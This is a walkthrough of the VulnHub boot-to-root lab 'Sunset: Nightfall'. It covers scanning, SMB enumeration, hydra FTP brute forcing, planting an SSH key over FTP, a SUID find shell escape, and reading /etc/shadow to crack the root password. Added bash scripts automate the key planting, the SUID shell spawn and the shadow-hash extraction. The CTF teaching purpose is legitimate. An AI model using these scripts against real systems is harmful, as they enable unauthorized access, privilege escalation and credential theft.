Sunset: Nightfall Vulnhub Walkthrough
Here is another CTF challenge for CTF players, named “Sunset: Nightfall”, which can be downloaded from VulnHub here. Credit goes to “whitecr0wz” for designing this VM for beginners. It is a Linux-based boot-to-root challenge on which basic pentesting skills are enough to compromise the VM and escalate to a root shell.
Level: Easy
Task: Boot to Root
Pentesting Methodology
Network Scanning
- Netdiscover
- Nmap
Enumeration
- Enum4linux
Exploiting
- FTP Brute force
- Planting an SSH key with a blank passphrase
- SSH login
Privilege Escalation
- SUID Binaries
- Sudo Rights
Walkthrough
Network Scanning
Let’s begin with a network scan using netdiscover to identify the IP address of the target machine.
This gave 192.168.0.24 as the host IP; now we move on to port and service scanning.
For a deep scan we always prefer nmap’s aggressive scan (-A), and this time we take the same approach, so we run the command below to enumerate open ports and the services running on them.
The scan result shows multiple open ports for various services, but port 21 looks the most interesting: the FTP service is served by pyftpdlib (a Python FTP server library), not a conventional FTP daemon.
Enumeration
For more detail we start enumerating the host. We first browsed to the HTTP service, but found nothing useful there.
Enumerating the SMB service with enum4linux revealed two usernames, “nightfall” and “matt”.
Exploiting
Since we have enumerated two usernames, we run a brute-force attack against the FTP service with hydra to find their passwords.
Great! “Cheese” is the password of user “matt”; let’s use this credential to log into FTP.
We logged into FTP successfully. An FTP session is not a shell on the host, though, so to get a proper TTY we first tried to upload a malicious file into /var/www/html, but we were unable to access that directory.
This is because the FTP service is pyftpdlib, which serves only the directory it was configured with (the login user’s home directory, as the next step confirms); anything outside that directory, including /var/www/html, is simply not reachable through FTP.
But we still have another approach: SSH key placement. We will plant our own SSH public key on the host and then log in over SSH to get a TTY shell. Since the FTP root is matt’s home directory, this is achieved by creating a folder named .ssh and uploading our public key into it as authorized_keys.
So, on our local machine, we generated an SSH key pair with a blank passphrase using ssh-keygen, which creates two files: the private key id_rsa and the public key id_rsa.pub. We then copied id_rsa.pub to a file named authorized_keys, which we now need to transfer to the host.
As we already have FTP access as matt, it is easy to upload authorized_keys into the .ssh directory we created earlier. If the SSH login is still refused afterwards, check the permissions: with StrictModes (the sshd default) an authorized_keys file or .ssh directory that is writable by group or others is ignored.
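The key-placement steps above, scripted end to end as an added example; this is not code from the original walkthrough. It assumes curl as the FTP client (its --ftp-create-dirs option creates the remote .ssh directory), an ed25519 key instead of the page’s RSA key, that the FTP root is the target user’s home directory, and that TARGET, FTP_USER and FTP_PASS are supplied by the caller.

```bash
#!/bin/bash
# Added example: stage a passphrase-less SSH key pair locally, push the public
# half to the target over FTP as ~/.ssh/authorized_keys, then log in with the
# private half. Assumed, not taken from the page: curl as FTP client, an
# ed25519 key, and the FTP root being the user's home directory.

# Build <dir>/id_ed25519, <dir>/id_ed25519.pub and <dir>/.ssh/authorized_keys
# with the permissions sshd's StrictModes expects; prints the authorized_keys path.
prepare_ssh_key_dir() {
    local dir="$1"
    mkdir -p "$dir/.ssh"
    chmod 700 "$dir/.ssh"
    # -N "" = blank passphrase so the later ssh login needs no interaction
    ssh-keygen -q -t ed25519 -N "" -C "nightfall-ctf" -f "$dir/id_ed25519"
    cp "$dir/id_ed25519.pub" "$dir/.ssh/authorized_keys"
    chmod 600 "$dir/.ssh/authorized_keys"
    echo "$dir/.ssh/authorized_keys"
}

# Upload authorized_keys into .ssh under the FTP root; --ftp-create-dirs
# creates .ssh on the server if it does not exist yet.
upload_authorized_keys() {
    local host="$1" user="$2" pass="$3" dir="$4"
    curl -s --ftp-create-dirs --user "$user:$pass" \
        -T "$dir/.ssh/authorized_keys" "ftp://$host/.ssh/authorized_keys"
}

# Log in with the freshly planted key only (IdentitiesOnly avoids agent keys).
ssh_with_key() {
    local host="$1" user="$2" dir="$3"
    ssh -i "$dir/id_ed25519" -o IdentitiesOnly=yes "$user@$host"
}

# Usage: TARGET=192.168.0.24 FTP_USER=matt FTP_PASS='...' ./plant_key.sh run
if [ "${1:-}" = "run" ]; then
    : "${TARGET:?set TARGET}" "${FTP_USER:?set FTP_USER}" "${FTP_PASS:?set FTP_PASS}"
    work=$(mktemp -d)
    prepare_ssh_key_dir "$work" >/dev/null
    upload_authorized_keys "$TARGET" "$FTP_USER" "$FTP_PASS" "$work"
    ssh_with_key "$TARGET" "$FTP_USER" "$work"
fi
```

The same script serves the second key placement later in the box: once you have a shell as nightfall, only the upload step changes (copy the file into /home/nightfall/.ssh instead of using FTP).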
So, when we connect over SSH as matt, we log in successfully, as shown in the image below. At this point we have a foothold on the host; to reach a root shell we need to escalate privileges, so without wasting time we look for SUID-enabled binaries with the find command.
We found that /script/find has the SUID bit set and behaves like the standard Linux find utility. Since find can run arbitrary commands through -exec, we used it to execute /bin/sh and obtained a shell as nightfall, the owner of the binary.
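The SUID hunt above, as an added example that is not part of the original walkthrough: it lists setuid files under a root, flags the ones whose name is a program that can spawn a shell, and wraps the find -exec trick itself. The watchlist of names is a constructed subset and the -maxdepth/-exec behaviour of the box’s copy of find is assumed to match GNU find.

```bash
#!/bin/bash
# Added example: enumerate SUID binaries and flag those that can hand out a
# shell, then abuse a SUID copy of find the way the walkthrough does.
# The SHELL_CAPABLE list below is a constructed subset, not from the page.

# Regular files with the setuid bit under $1 (default /), one per line.
list_suid() {
    local root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Program names that can execute arbitrary commands while setuid.
SHELL_CAPABLE="find vim vi nmap python python3 perl bash sh env awk less more"

# Print "path<TAB>owner" for each SUID file whose basename is on the watchlist.
# The owner matters: the shell you get runs as that user, not as root.
flag_suid() {
    local root="${1:-/}" path name owner
    list_suid "$root" | while IFS= read -r path; do
        name=$(basename "$path")
        case " $SHELL_CAPABLE " in
            *" $name "*)
                owner=$(ls -ld "$path" | awk '{print $3}')
                printf '%s\t%s\n' "$path" "$owner"
                ;;
        esac
    done
}

# The escalation: make the SUID find spawn a shell. -maxdepth 0 matches only
# "." so the shell starts once; -p keeps the effective uid if /bin/sh is bash
# (dash, Debian's /bin/sh, keeps it without the flag).
spawn_shell_via_find() {
    local suid_find="$1"
    "$suid_find" . -maxdepth 0 -exec /bin/sh -p \;
}

# Usage: ./suid_hunt.sh            -> report
#        spawn_shell_via_find /script/find   (after sourcing, on the target)
if [ "${1:-}" != "--no-report" ] && [ -z "${SUID_HUNT_SOURCED:-}" ] && [ "${BASH_SOURCE[0]}" = "$0" ]; then
    flag_suid "${1:-/}"
fi
```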
With the nightfall shell we found our first flag in the user.txt file.
This was a limited shell, so to get a proper shell as nightfall we repeated the earlier approach of planting the blank-passphrase SSH key: inside /home/nightfall we created a .ssh folder and copied in the authorized_keys file we had created previously.
Privilege Escalation
Now we repeat the login step and connect over SSH as nightfall, which gives us a proper SSH shell, as shown in the image below. Next we check nightfall’s sudo rights (sudo -l) and observe that he may run the cat program as root, which means we can read privileged files such as /etc/shadow.
We ran sudo cat /etc/shadow to read the shadow file and obtained the password hashes.
So, we saved the hash of user root in a text file and used John the Ripper to crack it.
Boom!! We got user: root, password: miguel2
Using the credential root:miguel2 we got a root shell, and inside the /root directory we found our final flag.
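The hash-extraction step, as an added example that is not from the original post: it takes the output of sudo cat /etc/shadow on stdin, keeps only accounts that actually have a hash (locked “!” and “*” entries are useless to john), writes the chosen user’s line to a file and names the john format from the crypt(3) prefix. The shadow lines in SAMPLE_SHADOW are constructed sample data, not the box’s real hashes, and the rockyou path in the suggested command is an assumption.

```bash
#!/bin/bash
# Added example: prepare a shadow hash for John the Ripper.
# SAMPLE_SHADOW is constructed data (no real password hashes in it).

SAMPLE_SHADOW='root:$6$saltsalt$CONSTRUCTEDSHA512HASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
matt:$1$salt$CONSTRUCTEDMD5HASHxxxxxxx:18000:0:99999:7:::
nightfall:!:18000:0:99999:7:::'

# Print user:hash for every account whose second field is a real hash;
# skips empty, "!" (locked) and "*" (no password) entries. Reads stdin.
crackable_hashes() {
    awk -F: '$2 != "" && $2 !~ /^[!*]/ { print $1 ":" $2 }'
}

# Map the crypt(3) prefix of a hash to a john --format name.
# $y$ (yescrypt) is left to john's libc-backed "crypt" format.
hash_format() {
    case "$1" in
        '$6$'*)        echo sha512crypt ;;
        '$5$'*)        echo sha256crypt ;;
        '$1$'*)        echo md5crypt ;;
        '$2'[aby]'$'*) echo bcrypt ;;
        '$y$'*)        echo crypt ;;
        *)             echo unknown ;;
    esac
}

# Save only <user>'s user:hash line to <out> and print the john command to run.
# Returns 1 if that user has no crackable hash.
save_for_john() {
    local user="$1" out="$2" fmt
    crackable_hashes | awk -F: -v u="$user" '$1 == u' > "$out"
    [ -s "$out" ] || return 1
    fmt=$(hash_format "$(cut -d: -f2 "$out")")
    # Wordlist path is an assumption (Kali default location).
    echo "john --format=$fmt --wordlist=/usr/share/wordlists/rockyou.txt $out"
}

# Usage on the target's output: sudo cat /etc/shadow | save_for_john root root.hash
# Offline demo on the constructed sample:
printf '%s\n' "$SAMPLE_SHADOW" | save_for_john root /tmp/root.hash
```

Feeding john only the root line instead of the whole shadow file is deliberate: it keeps the cracking session focused on the one hash that matters and avoids wasting time on accounts you already own.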
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, a social media lover and a gadgets enthusiast. Contact here.